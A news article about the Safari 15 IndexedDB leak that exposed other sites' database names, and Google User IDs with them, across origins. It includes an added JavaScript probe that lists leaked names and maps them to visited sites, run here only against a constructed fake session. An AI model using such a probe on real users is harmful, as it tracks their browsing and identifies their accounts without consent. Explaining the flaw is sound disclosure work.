A new Safari browser vulnerability allows Cross-Site User Tracking
A software bug has been identified in Apple Safari 15 in which the IndexedDB API lets any malicious website track a user's activity on other sites while they browse. The vulnerability, dubbed "IndexedDB leaks", was first disclosed by FingerprintJS, who reported the bug to Apple on November 28th, 2021.
IndexedDB is a low-level JavaScript API offered by web browsers for managing a NoSQL database of structured data, including files and blobs. The same-origin policy is a fundamental browser security mechanism that isolates resources belonging to distinct origins, where an origin is the combination of scheme, host and port. By restricting how a script loaded from one origin can interact with resources of another origin, the policy contains malicious scripts and shrinks the attack surface: a malicious website cannot read another site's data or run code in that site's context.
Safari browser vulnerability and the handling of the IndexedDB API
In Safari 15, however, the way the IndexedDB API is handled violates the same-origin policy. When a website interacts with a database, a new, empty database with the same name is created in all other frames, tabs and windows within the same active browser session.
The problem is that this privacy violation allows any website to learn which other websites the user has open or has visited during the session. That includes Google services such as YouTube and Google Calendar, which create IndexedDB databases whose names contain the Google User ID, an internal identifier that maps to a Google Account, so a malicious page can read that identifier straight out of the leaked database name.
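The following is an added example, not code from the article or from FingerprintJS, showing both halves of the story above: what the same-origin policy actually compares, and how a page on one origin would turn the leaked database names into a list of visited sites. It is written for Node.js so it runs offline: the `LEAKY_SESSION` object and the `KNOWN_DB_NAMES` table are constructed stand-ins (the real per-site database names are not reproduced here), and `listDatabaseNames` takes the `indexedDB` object as a parameter so the fake can be injected. In a real Safari 15 page you would call it with the browser's global `indexedDB`.

```javascript
// Added example (not from the article or FingerprintJS). Node.js >= 14; no dependencies.

// 1. Same-origin check: only scheme, host and port matter. Note that the WHATWG URL
//    parser drops a default port, so https://a.example and https://a.example:443 are
//    the same origin, while a different scheme, subdomain or explicit port is not.
function sameOrigin(urlA, urlB) {
  const a = new URL(urlA);
  const b = new URL(urlB);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// 2. The probe. indexedDB.databases() resolves to [{name, version}, ...] for the
//    calling origin. In Safari 15 it also returned the names of databases that other
//    origins opened in the same session, which is the whole leak: the cross-origin
//    copies are empty, so the name is the only thing that crosses the boundary.
//    `idb` defaults to the browser global; in Node it is undefined and we return [].
async function listDatabaseNames(idb = globalThis.indexedDB) {
  if (!idb || typeof idb.databases !== 'function') {
    return []; // no IndexedDB, or an engine without databases() (e.g. older Firefox)
  }
  const entries = await idb.databases();
  const names = entries.map((e) => e.name).filter((n) => typeof n === 'string' && n);
  return [...new Set(names)].sort();
}

// 3. Mapping leaked names back to sites. A tracker would build this table by visiting
//    popular sites and recording the database names they create. CONSTRUCTED sample
//    entries only; the real names are site-specific and are not reproduced here.
const KNOWN_DB_NAMES = {
  'example-shop-cart': 'shop.example',
  'example-mail-index': 'mail.example',
};

function inferVisitedSites(names) {
  const sites = new Set();
  for (const name of names) {
    const site = KNOWN_DB_NAMES[name];
    if (site) sites.add(site);
  }
  return [...sites].sort();
}

// 4. A constructed stand-in for a leaky Safari 15 session: the calling origin only
//    ever created 'my-own-db', but two names from other origins are visible too.
const LEAKY_SESSION = {
  databases: async () => [
    { name: 'example-shop-cart', version: 1 },
    { name: 'example-mail-index', version: 3 },
    { name: 'my-own-db', version: 1 },
  ],
};

// Runs the probe against a session object and returns what a tracker would learn.
async function probeSession(idb = LEAKY_SESSION) {
  const names = await listDatabaseNames(idb);
  return { names, sites: inferVisitedSites(names) };
}

probeSession().then((result) => console.log(JSON.stringify(result)));
```

Two things worth noting from the code. First, `sameOrigin` never looks at the path or query, which is exactly why a database created by `https://mail.example/inbox` should be invisible to `https://tracker.example/` but visible to `https://mail.example/settings`. Second, because only the name leaks, a site that embeds a user identifier in its database name (as the Google services above do) hands the tracker not just "this user visited me" but "this specific account visited me".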
To make things worse, private (incognito) browsing is not exempt from this Safari browser vulnerability. Jake Archibald said in a tweet that this is a huge Safari browser vulnerability and that Safari users should switch to a different browser to avoid data leakage. However, that advice only applies on desktops and laptops: on iOS every browser must use Apple's WebKit engine, so iOS users have no way to avoid the bug by switching browsers.